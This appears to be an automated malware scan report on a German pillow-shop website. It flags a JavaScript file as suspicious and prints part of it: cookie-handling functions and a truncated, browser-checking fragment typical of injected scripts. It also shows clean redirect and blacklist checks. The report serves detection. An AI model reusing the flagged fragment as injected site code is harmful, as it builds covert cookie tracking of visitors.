Scanned pages/files
Request | Server response | Status |
http://gesundes-kissen.de/ | 200 OK Content-Length: 24240 Content-Type: text/html | clean |
http://gesundes-kissen.de/gm_javascript.js.php?XTCsid=8fi3332nauambrfp5dfisvf0k1&test=&page= | 200 OK Content-Length: 166452 Content-Type: text/html | suspicious |
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;}
if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user1062 = get function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");} | ||
http://gesundes-kissen.de/test404page.js | 404 Not Found Content-Length: 29477 Content-Type: text/html | clean |
http://gesundes-kissen.de/gm_javascript.js.php?XTCsid=nrbgjarvpnkhtlhi5pv78cqv57&test=&page=cat&cPath=0 | 200 OK Content-Length: 171361 Content-Type: text/html | suspicious |
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;}
if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user1062 = get function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");} |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gesundes-kissen.de
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 05 May 2014 20:59:04 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=iso-8859-15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: XTCsid=8fi3332nauambrfp5dfisvf0k1; path=/; domain=.gesundes-kissen.de
GET / HTTP/1.1
Host: gesundes-kissen.de
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 05 May 2014 20:59:04 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=iso-8859-15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: XTCsid=8fi3332nauambrfp5dfisvf0k1; path=/; domain=.gesundes-kissen.de
Second query (visit from search engine):
GET / HTTP/1.1
Host: gesundes-kissen.de
Referer: http://www.google.com/search?q=gesundes-kissen.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gesundes-kissen.de
Referer: http://www.google.com/search?q=gesundes-kissen.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gesundes-kissen.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gesundes-kissen.de/
Result: gesundes-kissen.de is not infected or malware details are not published yet.
Result: gesundes-kissen.de is not infected or malware details are not published yet.